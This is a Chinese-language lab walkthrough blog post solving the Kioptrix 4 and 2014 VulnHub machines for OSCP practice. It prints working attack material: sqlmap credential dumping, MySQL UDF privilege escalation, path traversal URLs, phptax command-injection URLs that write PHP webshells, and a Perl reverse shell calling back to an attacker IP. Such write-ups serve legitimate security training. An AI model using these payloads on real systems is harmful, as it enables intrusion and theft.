Home
avatar

静静

Day5 Kioptrix 系列靶机4-5

一点 0分钟 渗透测试

关注 泷羽Sec泷羽Sec-静安公众号,这里会定期更新与 OSCP、渗透测试等相关的最新文章,帮助你理解网络安全领域的最新动态。 关注公众号泷羽Sec-静安,后台回复找工具+Day4获取BurpSuit 和Yakit安装包。

最近忙这学C++,还有工作调动,好消息是我升职了,祝各位同行也早日升职,走上人生巅峰,实现财富自由,我也向着这个目标努力哈哈哈。前两天在忙着找房子租房子,找了一圈下来基本都要1500+/月,一室一厅一卫,最后还是算了,睡单位破宿舍得了,免费又近,上下班时间2分钟,除了洗澡洗衣服不方便。而且后面忙起来可能会一直在办公室加班,在办公室学习也不错的。我们办公室学习氛围很好。

2025年2月21日 16点12分

Kioptrix: Level 1.3 (#4)

老样子先看网段。

image-20250221161947371image-20250221162038841

打开网页看,一个登录入口,弱密码和sql注入试了似乎不行。

image-20250221162441938 image-20250221162529901

目录扫描发现似乎有敏感文件泄露。

image-20250221162558770

image-20250221162731610

没有什么发现,重新用dirsearch扫描试试。

image-20250221163717257

image-20250221163608733

直接用john/1234登录index是不行的,但是继续扫描发现有额外的登录页面。试了也不行。

image-20250221163826938

只有返回登陆界面试试sqlmap自动注入,尽量别用,下次有别的思路再试试。

sqlmap -r KP4.txt --dump --batch --level 3

image-20250221164857841

Database: members
Table: members
[2 entries]
+----+-----------------------+----------+
| id | password              | username |
+----+-----------------------+----------+
| 1  | MyNameIsJohn          | john     |
| 2  | ADGAdsafdfwt4gadfga== | robert   |
+----+-----------------------+----------+

image-20250221164942956

网页能登录,但是啥也没有,试试ssh登录。

ssh -o HostKeyAlgorithms=+ssh-rsa john@192.168.139.133

image-20250221165304177

登上去后发现应该是命令受限,只能使用几个命令,whoami都不行。help发现只能用下面这几个。

image-20250221165351239

用echo就能逃逸这个终端环境到bash环境,用更多命令。

image-20250221165521336

find / -name "*.php" 2>/dev/null

找一下php文件,刚刚目录扫描出来的文件泄露有php,所以可能有php文件泄露。

image-20250221165812243

image-20250221165844204

image-20250221165916389

两个php文件内容是一样的,其他的看了也没有特别的发现,这里写了用户名和密码,root,空密码,是mysql的密码。

 mysql -u root -p

image-20250221170148188

然后再在mysql里面用udf提权,老演员了。

UDF提权方法1-手动哈希注入

show global variables like "secure_file_priv";
select @@version_compile_os, @@version_compile_machine;

image-20250221170351077

这个属性为空值就可以提权。

image-20250221170434692

不太确认用哪个了,而且plung目录似乎没有,这个方法不行。

image-20250221172430058

UDF提权方法2-sys_exec函数提权

sys_exec可以使用系统命令,直接把john加管理员里。

select * from mysql.func
select sys_exec('usermod -a -G admin john');

image-20250221170759716

image-20250221171126775

udf提权方法3-sqlmap提权

以上是手动写入的方法,以下是sqlmap自动写入的方法,sqlmap使用前提是知道账号密码。

sqlmap -d "mysql://root:@192.168.139.133:3306/mysql" --os-shell

image-20250221171429958

此处应用失败是因为靶机的mysql端口没有打开,只是在内部访问。

image-20250221171725641

2025年2月21日 17点27分

Kioptrix: 2014 (#5)

2025年2月22日14点04分

官方推荐的靶场笔记博客 https://www.abatchy.com/2017/01/kioptrix-2014-5-walkthrough-vulnhub.html

打开靶机,扫描靶机。

image-20250222141639165

端口,ssh没有开放,就一个80和8080端口开放。

image-20250222142146186

主页就一个静态网页。

image-20250222141742746

image-20250222142227341

image-20250222141958434

curl网页源码发现一个应该是框架的东西pChart从名字看应该改是画图之类的东西。搜索相关利用漏洞,只有一个。

image-20250222145855558

image-20250222150208066

先测试一下能不能打开这个网页,如果打不开,Vmware提示什么FreeBSD tools更新之类的是vmware犯病,不用管也不用更新,重启靶机就行。

image-20250222151522359

然后就能用这个漏洞看文件了,看密码,看apache配置。

http://192.168.139.134/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd
http://192.168.139.134/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf

2025年2月22日 15时18分

之前能打开一次,估计时靶机有问题,然后vmware老提示FreeBSD tools安装的问题,不确定是哪一个,重新下载官方镜像,然后安装VBox相关插件再试试,我看官网是用Vbox 的。还有可能是劫持问题。后面试了有觉得可能是因为刷靶机中途开了加速器玩了几把Kards,开加速器的时候把代理干废了,然后就登不上了。

image-20250224142151596

是玩游戏导致代理混乱,重新在BurSuit中配置代理的方法。这个是我翻墙的代理,平时都开着。

image-20250224163151192

burp连代理有时候不成功,多试几次,可能是因为机场问题,检查一下机场节点是不是超过300ms了。

image-20250224163400792

2025年2月24日 14点25分

image-20250224142556577

就是代理问题,回头要重新配代理,刷靶机的时候不要瞎玩游戏。

image-20250224144049960

image-20250224144033567

可以看到服务器配置信息里写了,配置信息里写了用mozilla的请求头就可以访问8080

image-20250224144730129

image-20250224144910843

如果没有安装hackbar,也可以用curl方法判断。

image-20250224145001566

搜索并下载相关poc。

image-20250224145247995

image-20250224145630201

这里他给出了漏洞原理是phptax有个漏洞,就可以利用这个漏洞执行命令。这里恶意代码执行的是nc -l -v -p 23235 -e /bin/bash,需要在攻击机上启动nc监听端口来接收反弹的shell。但是,我查了网上的一些攻略帖子说nc bash php python都弹不回来,可能是靶机没有这几个命令或者限制用这几个命令。

image-20250224145610187

链接靶机

方法1:一句话木马链接蚁剑终端

先测试靶机能不能执行命令。

http://192.168.139.134:8080/phptax/drawimage.php?pfilez=xxx;ls%20-al%20%3e1.txt;&pdf=make

image-20250224150929610

或者在BurpSuit里面抓包后send

image-20250224164601194

把一句话木马加工到上面的连接中

<?php system($_GET["cmd"]);?>
http://192.168.139.134:8080/phptax/drawimage.php?pfilez=xxx;ls%20-al%20%3e1.txt;&pdf=make
http://192.168.139.134:8080/phptax/drawimage.php?pfilez=xxx;echo '<?php system($_GET["cmd"]);?>' > 222.php;&pdf=make
http://192.168.139.134:8080/phptax/drawimage.php?pfilez=xxx;echo '<?php system($_REQUEST["cmd"]);?>' > ant.php;&pdf=make

image-20250224165052724

image-20250224165216760

然后再执行一次ls看1.txt里面有111.php了。然后也能成功执行命令。

image-20250224171002435

蚁剑安装包:https://www.yuque.com/antswordproject/antsword/srruro

2025年2月24日 18点04分

也可关注公众号泷羽Sec-静安,后台回复找工具+Day4获取。

2025年2月25日 9点15分

http://192.168.139.134:8080/phptax/drawimage.php?pfilez=xxx;echo '<?php system($_REQUEST["cmd"]);?>' > ant.php;&pdf=make

注意,蚁剑要用上面这句_REQUEST生成的木马php才可以连成功。

image-20250225094453177

image-20250225094735151

方法2:perl弹nc反连

nc -lvnp 4777
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.139.128:4777");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
http://192.168.139.134:8080/phptax/drawimage.php?pfilez=xxx;perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.139.128:4777");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;';&pdf=make

image-20250225095238148

方法3:msf全家桶一键(不推荐考试只有一次机会)

image-20250226163339507

image-20250226163622331

不知道为什么没有终端传过来,可能是msf版本问题,外国人写的几个教程都比较老了21年以前的msf。msf版本更新是会出现一些打不进去的情况。要多走几条路,条条大路通罗马,根根网线通靶机。

提权

image-20250225095717745

image-20250225095812064

26368.c,这里注意检查一下靶机上有没有gcc,有的话就先传c文件,到靶机编译。然后顺带查一下有哪些传文件的命令,有nc和ftp可以用。

image-20250225100125916

新版的kali直接开ftp服务器有点问题,提示要下载包,但是下载也有问题。

image-20250225101318246

sudo apt install pipx
pipx ensurepath
pipx install pyftpdlib
pipx run pyftpdlib --directory=. --port=2121 --write

或者传到Windows本机物理机上的终端开ftp。

pip install pyftpdlib
 python -m pyftpdlib

image-20250225101809728

ftp ftp://192.168.139.1:2121/26368.c

然后再在靶机上用ftp的命令下载。

image-20250225102109173

用蚁剑的话可以直接传文件。但是蚁剑的终端显示不了root,所以混合着用。

image-20250225100735951

image-20250225101027822

image-20250225100957022

小技巧

一句话木马和反弹shell的命令记不得可以用这个插件—— Hack Tools

image-20250224170819687

🔔 想要获取更多网络安全与编程技术干货?

关注 泷羽Sec-静安 公众号,与你一起探索前沿技术,分享实用的学习资源与工具。我们专注于深入分析,拒绝浮躁,只做最实用的技术分享!💻

扫描下方二维码,马上加入我们,共同成长!🌟

👉 长按或扫描二维码关注公众号

或者直接回复文章中的关键词,获取更多技术资料与书单推荐!📚

OSCP